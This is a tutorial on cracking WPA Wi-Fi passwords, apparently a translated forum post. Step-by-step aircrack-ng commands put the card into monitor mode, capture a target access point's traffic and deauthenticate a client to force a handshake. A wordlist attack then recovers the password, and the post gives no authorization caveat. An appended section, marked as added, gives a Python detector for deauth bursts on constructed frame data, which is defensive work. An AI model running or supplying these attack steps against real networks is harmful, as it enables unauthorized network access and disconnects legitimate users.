Besides preparing a good tool, cracking a wireless password also takes some luck. Beyond that, you need to successfully capture the wireless password, and besides the cap file, the size of the dictionary used to run the password determines your success rate. Of course, the larger the dictionary, the longer it takes. With a small dictionary, it finishes in about the time it takes to wash your face; running a 3G dictionary on my own machine took nearly 8 hours. You do not necessarily need BT5 or Kali to do this. Ubuntu and Debian basically work too, and Windows also has ready-made GUI tools.

-------------------- I am an evil dividing line ------------------

1> Open the wicd network manager in BT5, select a signal, and click "Properties". In the dialog box, click "Information" to view the MAC address and channel number of the AP.

2> Run ifconfig to see the name of your wireless network card. Here, my wireless card is named wlan0.

3> Enable wireless monitoring:

    airmon-ng start <wireless device name> <channel number>
    e.g. airmon-ng start wlan0 4

// If it reports that process XXXX interferes, run kill XXX (XXX is the process number), then run the command above again until no error is reported.

4> After monitoring is enabled, select the target AP and run the following command:

    airodump-ng -w loiter -c 4 --bssid <AP's MAC> mon0

/* AP's MAC is the MAC address of the AP viewed earlier. In the output, the address under BSSID is the AP MAC and the address under STATION is the CP (client) MAC. Then select an active client. */

5> Using the client's MAC address, open a new terminal (do not close the previous one) and enter:

    aireplay-ng -0 10 -a <AP's MAC> -c <CP's MAC> mon0

// AP's MAC is the address under BSSID and CP's MAC is the address under STATION. After running the command, return to the first terminal and check whether the WPA handshake flag appears. If so, the handshake has been captured. If not, run the command again until it is.

6> Run:

    aircrack-ng -w password.txt -b <AP's MAC> loiter.cap

// password.txt is the dictionary file; the file you specify also needs to be in the default path.

7> Now it comes down to luck. The password is displayed when the crack succeeds. No reference here; you can google related successful examples.

8> Explanations of the commands and of the problem encountered in step 6:

    airodump-ng -w loiter -c 4 --bssid <AP's MAC> mon0

/* Captures the AP's data from mon0 on channel 4 and saves it to loiter.cap, usually in the root directory. If you capture multiple times, the file name increments, e.g. loiter-001.cap. -w loiter: the file name; -c 4: channel 4. */

    aireplay-ng -0 10 -a <AP's MAC> -c <CP's MAC> mon0

// -a: AP's MAC; -c: CP's MAC. Running this command may disconnect the client once.

    aircrack-ng -w password.txt -b <AP's MAC> loiter.cap

An error may occur when running this command directly because the path is incorrect. Taking my own machine as an example, the command above is written as:

    aircrack-ng -w /root/Dictionary/pw3G.txt -b <AP's MAC> /root/loiter.cap
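
Seen from the defender's side, step 5 leaves a recognizable trace: a burst of deauthentication frames aimed at one client, followed shortly by that client handshaking with the AP again. The following is an added example, not part of the original post, that flags this pattern in constructed frame records; the record layout, thresholds and MAC addresses are assumptions.

```python
from collections import defaultdict

AP = "AA:AA:AA:AA:AA:01"                      # constructed addresses
C1, C2 = "CC:CC:CC:CC:CC:01", "CC:CC:CC:CC:CC:02"

# Constructed records: (time in seconds, frame type, BSSID, client MAC).
# This layout is an assumption, not the output format of any real tool.
FRAMES = (
    [(0.0, "data", AP, C1)]
    + [(5.0 + 0.1 * k, "deauth", AP, C1) for k in range(10)]   # burst of 10
    + [(7.5 + 0.1 * k, "eapol", AP, C1) for k in range(4)]     # re-handshake
    + [(20.0, "deauth", AP, C2), (21.0, "eapol", AP, C2)]      # single deauth
)

def find_forced_reauth(frames, min_deauth=5, burst_window=2.0, reauth_window=30.0):
    """Return (bssid, client, burst_start, handshake_time) for every burst of
    at least min_deauth deauth frames within burst_window seconds that is
    followed by an EAPOL frame for the same pair within reauth_window."""
    deauths, eapol = defaultdict(list), defaultdict(list)
    for t, kind, bssid, client in frames:
        if kind == "deauth":
            deauths[(bssid, client)].append(t)
        elif kind == "eapol":
            eapol[(bssid, client)].append(t)

    alerts = []
    for key, times in deauths.items():
        times.sort()
        handshakes = sorted(eapol[key])
        i = 0
        while i < len(times):
            j = i
            # Grow the burst while frames stay inside the window.
            while j + 1 < len(times) and times[j + 1] - times[i] <= burst_window:
                j += 1
            if j - i + 1 >= min_deauth:
                end = times[j]
                after = [t for t in handshakes if end < t <= end + reauth_window]
                if after:
                    alerts.append((key[0], key[1], times[i], after[0]))
            i = j + 1
    return alerts

if __name__ == "__main__":
    for bssid, client, start, hs in find_forced_reauth(FRAMES):
        print(f"deauth burst at t={start}s on {client} via {bssid}, "
              f"handshake at t={hs}s")
```

The single deauthentication of the second client stays below the threshold and is not reported, which keeps ordinary disconnects out of the alerts.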